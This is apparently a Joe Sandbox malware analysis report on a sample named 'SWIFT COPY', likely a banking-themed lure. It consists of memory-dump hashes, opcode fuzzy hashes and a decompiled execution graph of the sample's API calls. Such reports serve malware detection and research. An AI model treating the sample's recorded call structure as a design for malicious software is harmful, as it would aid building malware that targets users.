                                                                                              • Snapshot File: hcaresult_0_2_99a0000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: ddb46b0e4123d97d6f62a3079fe814ceaf8af969d4237fe05397cbf60cbd2f75
                                                                                              • Instruction ID: 788c34bbeb594f88a5aadcc8372fd3ec4ebb53eeed03748f21922c2f6524a2fd
                                                                                              • Opcode Fuzzy Hash: ddb46b0e4123d97d6f62a3079fe814ceaf8af969d4237fe05397cbf60cbd2f75
                                                                                              • Instruction Fuzzy Hash: A2B10575E05609DFCB58CFA6D58069EFBB2FF88340F60D42AD419AB254EB349A06CF50
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1893015796.00000000099A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099A0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_99a0000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 6b87aeac4a57191a32ce41841d6ab672b11bab478c5ad9a7cbc002d3ee47879b
                                                                                              • Instruction ID: 475753528fcf4e06ac54d5b1b5aa5084a475f198d1e9a2a6c4183c2d4f0d0d06
                                                                                              • Opcode Fuzzy Hash: 6b87aeac4a57191a32ce41841d6ab672b11bab478c5ad9a7cbc002d3ee47879b
                                                                                              • Instruction Fuzzy Hash: 22B11575E05609DFDB58CFA6D58069EFBB2FF88340F60D42AD419A7264EB349A02CF50
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1889035519.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_4fb0000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 05baca43ec9ef2021ed808b5d9496809626191f3989ca807c4d71d92d6652902
                                                                                              • Instruction ID: daa6ce3095174df46dcedf794a6050a31947d1fa006ae3b7b91e457f1c732a52
                                                                                              • Opcode Fuzzy Hash: 05baca43ec9ef2021ed808b5d9496809626191f3989ca807c4d71d92d6652902
                                                                                              • Instruction Fuzzy Hash: F1516376714201CFD7068A6ADAE15E6BB62FB86290B25C437D08ADB200C730ED03C7E0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1893015796.00000000099A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099A0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_99a0000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: e5daf3c49c7a9d41e7ba7f1776ffc3e5ce688f6bcee0cd7792ee31da55c47d78
                                                                                              • Instruction ID: db198035f7d3dd9c38122c6fac21e10510cd5d346e8a99c2deca2273368c808f
                                                                                              • Opcode Fuzzy Hash: e5daf3c49c7a9d41e7ba7f1776ffc3e5ce688f6bcee0cd7792ee31da55c47d78
                                                                                              • Instruction Fuzzy Hash: B6910374A1521ACFCB44CF9AD98589EFBF2FF88350F249959D415AB320D334AA42CF91
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1893015796.00000000099A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099A0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_99a0000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: d13991945d689eccb97762370758dc7bc108fbd9aea57ea415ae1062589c8621
                                                                                              • Instruction ID: 629f53349e812d2b5480c939e392172aa10ce8dc38948f0637b8ef5d940c8e89
                                                                                              • Opcode Fuzzy Hash: d13991945d689eccb97762370758dc7bc108fbd9aea57ea415ae1062589c8621
                                                                                              • Instruction Fuzzy Hash: 46813470A1521ACFCB44CFA9C98599EFBF1FF88310F14996AD405AB221D334AA42CF91
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1893015796.00000000099A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099A0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_99a0000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: ab59602fe188e78c4696c0be1b4485f1a908f5e3133fb1799f3509a7ca7267e7
                                                                                              • Instruction ID: 3b407aa1be59134def03c9f0bdb0263cd6c6e6edbc08c30361a0dfe897a2b1ca
                                                                                              • Opcode Fuzzy Hash: ab59602fe188e78c4696c0be1b4485f1a908f5e3133fb1799f3509a7ca7267e7
                                                                                              • Instruction Fuzzy Hash: 3D810974E041698FCB14CF69C580AAEFBB6FF89344F24D5A9D418A7215D730AE42CFA1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1893015796.00000000099A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099A0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_99a0000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 0c7a5f45033f151bc72ae57a514f07d35ecdd417180afe6042b55aa871985169
                                                                                              • Instruction ID: 06af759d76da2695950106006e7a4d3b7a1ecffee8a60e213f447a29ff92313f
                                                                                              • Opcode Fuzzy Hash: 0c7a5f45033f151bc72ae57a514f07d35ecdd417180afe6042b55aa871985169
                                                                                              • Instruction Fuzzy Hash: C5810C74E142698FCB14CF69C580AAEFBB3FF89340F24C1A9D418A7215D730AA41CFA1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1893015796.00000000099A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099A0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_99a0000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 6148497b3795eb53341186fda159bd8fd7414ee44a373c589552ca8d80b4bd97
                                                                                              • Instruction ID: 5065445539de15acb849ee1e9a4a8a85621bc25a4ee0b75a7bf72e3a370c066b
                                                                                              • Opcode Fuzzy Hash: 6148497b3795eb53341186fda159bd8fd7414ee44a373c589552ca8d80b4bd97
                                                                                              • Instruction Fuzzy Hash: 0371F774E15619CFCB04CFA9C5805EEFBF2FF89350F25942AE419B7214D3349A418BA9
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1893015796.00000000099A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099A0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_99a0000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 60d4d780f19401a9b3188af157c9e320c972e2165785229ba05546046f406ef1
                                                                                              • Instruction ID: 47d950a935e4e00450e99b0710af8fd42a312d9aa0dcce5bfe8d8439a9df8293
                                                                                              • Opcode Fuzzy Hash: 60d4d780f19401a9b3188af157c9e320c972e2165785229ba05546046f406ef1
                                                                                              • Instruction Fuzzy Hash: C6710874E156198FCB04CFA9C5805EEFBF2EF89350F25942AE409B7254D3349E428BA9
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1889035519.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_4fb0000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 69a5f9ae497b511f99d024b061adc151257d9536e66ac7bdb64c2121ec24ef16
                                                                                              • Instruction ID: 60a06af3492a359b5228080379993d3e51c0dff0d93f7388381eee789557fd8b
                                                                                              • Opcode Fuzzy Hash: 69a5f9ae497b511f99d024b061adc151257d9536e66ac7bdb64c2121ec24ef16
                                                                                              • Instruction Fuzzy Hash: 13414573B581268BD7058EAECC811EBBB66E796204F0585A7E988DB245D230FE4747C1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1893477076.0000000009B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 09B70000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_9b70000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 98943c2eb4d3357bf9ea4bc98a339cf18519bcca8e6418195cba43a4eeafe832
                                                                                              • Instruction ID: 8196487e47a058e40eaf3e7b7dfbdc3c26084dec23f1398752128a675b6ef1df
                                                                                              • Opcode Fuzzy Hash: 98943c2eb4d3357bf9ea4bc98a339cf18519bcca8e6418195cba43a4eeafe832
                                                                                              • Instruction Fuzzy Hash: BF510974E042199FCB14CFA9C5815AEFBF2FF89310F24C2AAD418A7215D734A942CFA1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1893477076.0000000009B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 09B70000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_9b70000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: ba537d57e0f0093e29240fc0e04ef79301fda9eb65c721c69c3e68735c58838f
                                                                                              • Instruction ID: 86387a34e6a2dfaca4f001a15794d5e0602a740fe25b7466bbfb5dde081d908e
                                                                                              • Opcode Fuzzy Hash: ba537d57e0f0093e29240fc0e04ef79301fda9eb65c721c69c3e68735c58838f
                                                                                              • Instruction Fuzzy Hash: 77511774E042198FCB14CFA9C5815AEFBF2FF89310F24C2A9D458A7215D735A942CF61
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1893477076.0000000009B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 09B70000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_9b70000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 735d3f33e7d5664e45aae44911a1df9aee8a3db193affec53ef9999ccb80faff
                                                                                              • Instruction ID: f469e8d22139d4d201343d243467a43f5d8f837de1339e37a3e9b8b9bb2e57ed
                                                                                              • Opcode Fuzzy Hash: 735d3f33e7d5664e45aae44911a1df9aee8a3db193affec53ef9999ccb80faff
                                                                                              • Instruction Fuzzy Hash: FB512974E002198FDB14CFA9D9815AEFBF2FF89310F24C269D418A7215D734A942CF60
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1889035519.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_4fb0000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 42c36a01b58be401f83978b62438b5bf51756ceccdbf1520ef81ea580ad4943d
                                                                                              • Instruction ID: 3562b0b6681b03e2c2282b4906d92fa6e1153e7a1f752545f1d50eb0b52a9a0e
                                                                                              • Opcode Fuzzy Hash: 42c36a01b58be401f83978b62438b5bf51756ceccdbf1520ef81ea580ad4943d
                                                                                              • Instruction Fuzzy Hash: 03414B327142058FC718CF2AD589996B7F6FB8A350B15C86BD056CB650E674F982CB41
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1889035519.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_4fb0000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 9cf5cc95a1c7073b8e3cb74b2bf9fd273bfd4cf56737f8ced221dd2dccac29b1
                                                                                              • Instruction ID: 9739ef7f8b91538c14f26c7efee06b7c841a3b98ff0c1c92fe7ab978ab966c53
                                                                                              • Opcode Fuzzy Hash: 9cf5cc95a1c7073b8e3cb74b2bf9fd273bfd4cf56737f8ced221dd2dccac29b1
                                                                                              • Instruction Fuzzy Hash: 40413B32714206CFC718CF2AD489997B7E6FF89210B15C86BD05ADB654E774F942CB41
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1889035519.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_4fb0000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: bf219982aae16a9bc2a2f954551c888d038d6fe81e4ce80cc8fb107588e8fca4
                                                                                              • Instruction ID: 2c966e6ce5be90ff8cf373bf175f70cf9fe7bf38934323d6015cec089e1099a6
                                                                                              • Opcode Fuzzy Hash: bf219982aae16a9bc2a2f954551c888d038d6fe81e4ce80cc8fb107588e8fca4
                                                                                              • Instruction Fuzzy Hash: EF4123B2B14116CBCB04CF5ACAA06EAF762FB96390B258527D452DB600D330FE16CBD1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1893015796.00000000099A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099A0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_99a0000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: bf5408905e2ec8b532a8797fe93fb36ddd053b67c3537be27d9bb6dcf711659d
                                                                                              • Instruction ID: ba5a83d458111789dea46a4957e28deb1d53c33097966dcdf33568ebe09e3749
                                                                                              • Opcode Fuzzy Hash: bf5408905e2ec8b532a8797fe93fb36ddd053b67c3537be27d9bb6dcf711659d
                                                                                              • Instruction Fuzzy Hash: 87412CB0E0A60ADFCB44CFA6D5416AEFBF2EF88340F20986AC415B7254E77497418B95
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1893015796.00000000099A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099A0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_99a0000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: d6d6270f380ebb061cd830da04757308ba3d7360baeec3963f450bd6da76a289
                                                                                              • Instruction ID: d7229f5d85d9e4b23cde7ed2c1ed67cb2605c9d9fee6f0113c3efffbd4c1c4c3
                                                                                              • Opcode Fuzzy Hash: d6d6270f380ebb061cd830da04757308ba3d7360baeec3963f450bd6da76a289
                                                                                              • Instruction Fuzzy Hash: 0B41F7B0E0520ADFCB04CFAAC5815AEFBF2EF88340F24D56AD815F7215D7349A418BA5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1889035519.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_4fb0000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: ae1c878b3acbb580258fe87007f56fea66663ef1109fa3e981815fd2e5c4560b
                                                                                              • Instruction ID: b74ebd3318cb4be1d8d4b49649d15e79c4c03e58b605e35771ec946af73c76a8
                                                                                              • Opcode Fuzzy Hash: ae1c878b3acbb580258fe87007f56fea66663ef1109fa3e981815fd2e5c4560b
                                                                                              • Instruction Fuzzy Hash: CF41D4B6F941168FCB44CE9AC4855EEFBB5EB46300B60806B9C45EB350D270E902CBD2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1893015796.00000000099A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099A0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_99a0000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 4c7b38cbbd30b9c5a9cf0eb0b1bfed2718c708e4dd797da979bb2c5d7cb96d94
                                                                                              • Instruction ID: 78e6999e2b84e8d611c4e6b971d821db6c56b7f0ac64103b6792065b1a57a120
                                                                                              • Opcode Fuzzy Hash: 4c7b38cbbd30b9c5a9cf0eb0b1bfed2718c708e4dd797da979bb2c5d7cb96d94
                                                                                              • Instruction Fuzzy Hash: 5141F6B0E0520ADFCB44CFAAC5815AEFBF2EF88340F24D56AD815B7214D7349A418BA5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1893015796.00000000099A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099A0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_99a0000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 550a4b9fee5c29de8548eced29bc0e4b9968948e9bd5d7f6cdcd8fc61dd792f2
                                                                                              • Instruction ID: b1c4bce3d9a8273cbc4928303bd445966b13f088b112b94d3b59a7d64149b5bd
                                                                                              • Opcode Fuzzy Hash: 550a4b9fee5c29de8548eced29bc0e4b9968948e9bd5d7f6cdcd8fc61dd792f2
                                                                                              • Instruction Fuzzy Hash: 84411CB0E0A60ADFCB44CFA6D5416AEFBF1EF89340F20986AC415B7264E77497418B94
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1889035519.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_4fb0000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 12c3cda78dc7c9f09b9833b5e44dab186e61ff40b238a57e34cf90e8315b0c98
                                                                                              • Instruction ID: 0d5ab40326faa0fdd35b2a362ceaf32d55f88fbc18c9683fc0ae533fccaa1009
                                                                                              • Opcode Fuzzy Hash: 12c3cda78dc7c9f09b9833b5e44dab186e61ff40b238a57e34cf90e8315b0c98
                                                                                              • Instruction Fuzzy Hash: D131C4B7F941168BCB44CE9AC5855AEFBB5EB4A300B61842B9D45EB350D270E902CBD2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1893015796.00000000099A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099A0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_99a0000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 3a6c935ac629b5afebc7e51e928d6c2e0c81332795ed4c6e668830512ed4897c
                                                                                              • Instruction ID: 533c8b2fb984fe72ad34b2bca5ac7102a8b6c16a87551585ad4a503a4461cb69
                                                                                              • Opcode Fuzzy Hash: 3a6c935ac629b5afebc7e51e928d6c2e0c81332795ed4c6e668830512ed4897c
                                                                                              • Instruction Fuzzy Hash: 7841D0B0E0560ADFCB48CFAAC4815AEFBF2EF98300F24D42AD415A7254D3749A428F94
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1893015796.00000000099A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099A0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_99a0000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 31fc9d4c992ff273000aec168070759d217d7c1fe1f6d26e34a9eb143b89feff
                                                                                              • Instruction ID: 5d0b1b50e8994ec41901e8b73d00169ff8a58bf42ee9da4cfda52fc1ca18ae07
                                                                                              • Opcode Fuzzy Hash: 31fc9d4c992ff273000aec168070759d217d7c1fe1f6d26e34a9eb143b89feff
                                                                                              • Instruction Fuzzy Hash: 38410AB0E0560ADFDB08CFAAC4805AEFBF2EF98340F24C46AD415A7254D3749A42CF94
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1889035519.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_4fb0000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 174038537ce2cb7bf455a1515e16cb2af9de98151095535aed9ec4cfe3af8c6d
                                                                                              • Instruction ID: 5ead8d6b2b562cdd6a9c7d232002487a312fe9454b0e8ddebc1339616cec3d87
                                                                                              • Opcode Fuzzy Hash: 174038537ce2cb7bf455a1515e16cb2af9de98151095535aed9ec4cfe3af8c6d
                                                                                              • Instruction Fuzzy Hash: 45212432B583448FCB409AADC8D51DA7BB5FB86204F0A86A6D981DB642E374B90787D1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1893015796.00000000099A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099A0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_99a0000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 23acb5988d53b1ad4122442d05cbdcbbae3f085eae6c3e9ca2261cd3a8cddfd2
                                                                                              • Instruction ID: d1e0d6eab959cc8ccb50e6e11f89c89a1fb4ef7da23fac6eef8fc5a3654ee81d
                                                                                              • Opcode Fuzzy Hash: 23acb5988d53b1ad4122442d05cbdcbbae3f085eae6c3e9ca2261cd3a8cddfd2
                                                                                              • Instruction Fuzzy Hash: 60211271E097548FDB19CF6B981069EBFF3AFCA200F08C0B6C458AA265EB744545CF65
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1893015796.00000000099A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099A0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_99a0000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 9f4c08665f15989571a5be412ccc312a8514d899d0531049639aa2c7ea401271
                                                                                              • Instruction ID: 71d8471e4725d9eab4be78b675e6ed7a5081b78285af671b645cc053950e7ebd
                                                                                              • Opcode Fuzzy Hash: 9f4c08665f15989571a5be412ccc312a8514d899d0531049639aa2c7ea401271
                                                                                              • Instruction Fuzzy Hash: E011D771E046189BEB18CFABD80469EFAF7EFC9300F04C07AD918B6224EB7006468F55

                                                                                              Execution Graph

                                                                                              Execution Coverage:1.2%
                                                                                              Dynamic/Decrypted Code Coverage:5.3%
                                                                                              Signature Coverage:8.3%
                                                                                              Total number of Nodes:132
                                                                                              Total number of Limit Nodes:10
                                                                                              execution_graph 93270 4019c0 93271 4019d2 93270->93271 93274 42fd43 93271->93274 93277 42e383 93274->93277 93278 42e3a9 93277->93278 93289 407233 93278->93289 93280 42e3bf 93281 401a51 93280->93281 93292 41b143 93280->93292 93283 42e3de 93284 42e3f3 93283->93284 93307 42cad3 93283->93307 93303 428353 93284->93303 93287 42e40d 93288 42cad3 ExitProcess 93287->93288 93288->93281 93310 4164e3 93289->93310 93291 407240 93291->93280 93293 41b16f 93292->93293 93334 41b033 93293->93334 93296 41b1b4 93298 41b1d0 93296->93298 93301 42c743 NtClose 93296->93301 93297 41b19c 93299 41b1a7 93297->93299 93340 42c743 93297->93340 93298->93283 93299->93283 93302 41b1c6 93301->93302 93302->93283 93304 4283b5 93303->93304 93306 4283c2 93304->93306 93348 418673 93304->93348 93306->93287 93308 42caed 93307->93308 93309 42cafe ExitProcess 93308->93309 93309->93284 93311 4164fd 93310->93311 93313 416513 93311->93313 93314 42d173 93311->93314 93313->93291 93316 42d18d 93314->93316 93315 42d1bc 93315->93313 93316->93315 93321 42bdf3 93316->93321 93322 42be0d 93321->93322 93328 1372c0a 93322->93328 93323 42be36 93325 42e7d3 93323->93325 93331 42ca93 93325->93331 93327 42d232 93327->93313 93329 1372c11 93328->93329 93330 1372c1f LdrInitializeThunk 93328->93330 93329->93323 93330->93323 93332 42caad 93331->93332 93333 42cabb RtlFreeHeap 93332->93333 93333->93327 93335 41b04d 93334->93335 93339 41b129 93334->93339 93343 42be83 93335->93343 93338 42c743 NtClose 93338->93339 93339->93296 93339->93297 93341 42c75d 93340->93341 93342 42c76b NtClose 93341->93342 93342->93299 93344 42be9d 93343->93344 93347 13735c0 LdrInitializeThunk 93344->93347 93345 41b11d 93345->93338 93347->93345 93349 41869d 93348->93349 93355 418bab 93349->93355 93356 413cf3 93349->93356 93351 4187ca 93352 42e7d3 RtlFreeHeap 93351->93352 93351->93355 93353 4187e2 93352->93353 93354 42cad3 ExitProcess 93353->93354 93353->93355 93354->93355 93355->93306 93360 413d13 93356->93360 93358 413d7c 93358->93351 93359 413d72 93359->93351 93360->93358 93361 41b453 RtlFreeHeap LdrInitializeThunk 93360->93361 93361->93359 93362 424e23 93366 424e3c 93362->93366 93363 424e87 93364 42e7d3 RtlFreeHeap 93363->93364 93365 424e97 93364->93365 93366->93363 93367 424eca 93366->93367 93369 424ecf 93366->93369 93368 42e7d3 RtlFreeHeap 93367->93368 93368->93369 93370 42bda3 93371 42bdbd 93370->93371 93374 1372df0 LdrInitializeThunk 93371->93374 93372 42bde2 93374->93372 93396 42f873 93397 42f883 93396->93397 93398 42f889 93396->93398 93399 42e8b3 RtlAllocateHeap 93398->93399 93400 42f8af 93399->93400 93401 424a93 93402 424aaf 93401->93402 93403 424ad7 93402->93403 93404 424aeb 93402->93404 93405 42c743 NtClose 93403->93405 93406 42c743 NtClose 93404->93406 93408 424ae0 93405->93408 93407 424af4 93406->93407 93411 42e8f3 RtlAllocateHeap 93407->93411 93410 424aff 93411->93410 93375 41e543 93376 41e569 93375->93376 93380 41e666 93376->93380 93381 42f9a3 93376->93381 93378 41e604 93379 42bdf3 LdrInitializeThunk 93378->93379 93378->93380 93379->93380 93382 42f913 93381->93382 93386 42f970 93382->93386 93387 42e8b3 93382->93387 93384 42f94d 93385 42e7d3 RtlFreeHeap 93384->93385 93385->93386 93386->93378 93390 42ca53 93387->93390 93389 42e8ce 93389->93384 93391 42ca6d 93390->93391 93392 42ca7b RtlAllocateHeap 93391->93392 93392->93389 93412 413b13 93415 42c9c3 93412->93415 93416 42c9dd 93415->93416 93419 1372c70 LdrInitializeThunk 93416->93419 93417 413b35 93419->93417 93420 41b333 93421 41b377 93420->93421 93422 41b398 93421->93422 93423 42c743 NtClose 93421->93423 93423->93422 93424 1372b60 LdrInitializeThunk 93425 414119 93426 4140a6 93425->93426 93428 414122 93425->93428 93429 4140ba 93426->93429 93432 417813 93426->93432 93430 4140f3 PostThreadMessageW 93429->93430 93431 414106 93429->93431 93430->93431 93433 417837 93432->93433 93434 41783e 93433->93434 93435 417879 LdrLoadDll 93433->93435 93434->93429 93435->93434 93393 418dc8 93394 42c743 NtClose 93393->93394 93395 418dd2 93394->93395

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 536 417813-41783c call 42f3b3 539 417842-417850 call 42f9b3 536->539 540 41783e-417841 536->540 543 417860-417871 call 42de53 539->543 544 417852-41785d call 42fc53 539->544 549 417873-417887 LdrLoadDll 543->549 550 41788a-41788d 543->550 544->543 549->550
                                                                                              APIs
                                                                                              • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417885
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2223687657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_SWIFT COPY.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Load
                                                                                              • String ID:
                                                                                              • API String ID: 2234796835-0
                                                                                              • Opcode ID: 56521a4f42ae9fa4dd1f48ddcc66fa5ad703c4b222d6c0bc46afaba39208bf64
                                                                                              • Instruction ID: 05a5680942dabe8a321efdcf2b6f82430579c081dca23c65dcb556c1d755013b
                                                                                              • Opcode Fuzzy Hash: 56521a4f42ae9fa4dd1f48ddcc66fa5ad703c4b222d6c0bc46afaba39208bf64
